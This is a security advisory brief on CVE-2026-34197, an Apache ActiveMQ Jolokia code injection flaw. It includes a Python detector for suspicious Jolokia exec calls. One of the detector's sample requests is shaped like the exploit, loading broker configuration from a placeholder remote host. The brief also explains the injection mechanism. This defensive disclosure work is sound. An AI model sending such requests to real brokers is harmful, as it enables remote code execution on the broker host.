Active KEV: CVE-2026-34197 (2026-05-17)

CVE-2026-34197: Apache ActiveMQ Jolokia Code Injection Lands on CISA KEV

Apache ActiveMQ ships with a Jolokia JMX-HTTP bridge whose default access policy lets an authenticated attacker turn a broker management call into arbitrary code execution on the JVM, and CISA added it to the Known Exploited Vulnerabilities catalog on 2026-04-16.

What Is It

An improper input validation and code injection flaw (CWE-20, CWE-94) in Apache ActiveMQ Classic. The web console exposes the Jolokia JMX-HTTP bridge at /api/jolokia/, and the default Jolokia access policy permits exec operations on all org.apache.activemq:* MBeans, including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).

An authenticated attacker invokes those operations with a crafted discovery URI that drives the VM transport's brokerConfig parameter to load a remote Spring XML application context through ResourceXmlApplicationContext. Spring instantiates all singleton beans before BrokerService validates the configuration, so bean factory methods such as Runtime.exec() fire arbitrary code on the broker's JVM.

NVD rates it CVSS 3.1 8.8 HIGH (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H): network-reachable, low attack complexity, low privileges required, no user interaction, and high confidentiality, integrity, and availability impact.
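As an added detection example (not from this brief or the ActiveMQ project), the Python below inspects Jolokia JSON request bodies as a reverse proxy or log pipeline might capture them and flags exec calls against the two operations named above, escalating when the argument carries the brokerConfig parameter. The MBean name, the URI and all sample bodies are constructed placeholders.

```python
import json

# MBean domain and operations the brief identifies as reachable through the
# default Jolokia access policy.
ACTIVEMQ_DOMAIN = "org.apache.activemq:"
RISKY_OPERATIONS = {"addNetworkConnector", "addConnector"}
# Argument substring indicating an attempt to load a broker configuration
# through the VM transport (the brokerConfig parameter described above).
CONFIG_LOAD_MARKER = "brokerConfig="


def _operation_name(op):
    # Jolokia accepts "addConnector" as well as "addConnector(java.lang.String)".
    return op.split("(", 1)[0].strip()


def _classify(req):
    """Return a finding dict for one Jolokia request, or None if benign."""
    if not isinstance(req, dict) or req.get("type") != "exec":
        return None
    mbean = str(req.get("mbean", ""))
    if not mbean.startswith(ACTIVEMQ_DOMAIN):
        return None
    op = _operation_name(str(req.get("operation", "")))
    if op not in RISKY_OPERATIONS:
        return None
    args = " ".join(str(a) for a in req.get("arguments", []) or [])
    # Legitimate operators may add a plain connector; a remote config load is not normal.
    severity = "critical" if CONFIG_LOAD_MARKER in args else "high"
    return {"severity": severity, "mbean": mbean, "operation": op, "arguments": args}


def scan_jolokia_body(body):
    """Findings for a Jolokia POST body; handles a single request or a bulk list."""
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return []
    requests = data if isinstance(data, list) else [data]
    return [f for f in (_classify(r) for r in requests) if f]


# Constructed sample bodies (not captured traffic); hostnames are placeholders.
SAMPLES = [
    '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"attribute":"TotalConnectionsCount"}',
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addNetworkConnector(java.lang.String)",'
    '"arguments":["vm://localhost?brokerConfig=http://placeholder.invalid/ctx.xml"]}',
    '[{"type":"exec","mbean":"java.lang:type=Memory","operation":"gc"},'
    ' {"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addConnector","arguments":["tcp://0.0.0.0:61617"]}]',
]

if __name__ == "__main__":
    for body in SAMPLES:
        for finding in scan_jolokia_body(body):
            print(finding)
```

A "high" finding on addConnector should be reconciled against change records, since operators can legitimately invoke it; a "critical" finding warrants treating the console credential as compromised.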

Why It Matters

ActiveMQ brokers sit on internal message buses moving high-trust traffic between services, and authenticated abuse of a built-in management endpoint is exactly the kind of pivot that turns a stolen console credential into broker-host RCE. CISA added CVE-2026-34197 to the KEV catalog on 2026-04-16 with a federal remediation due date of 2026-04-30. Known ransomware campaign use is currently listed as Unknown.

What's Vulnerable

Apache ActiveMQ Broker, Apache ActiveMQ All, and Apache ActiveMQ:

Affected CPEs include cpe:2.3:a:apache:activemq:* and cpe:2.3:a:apache:activemq_broker:* across both version ranges.

Patch Status

Apache has shipped fixes. Users should upgrade to 5.19.4 or 6.2.3. CISA's required action: apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Sources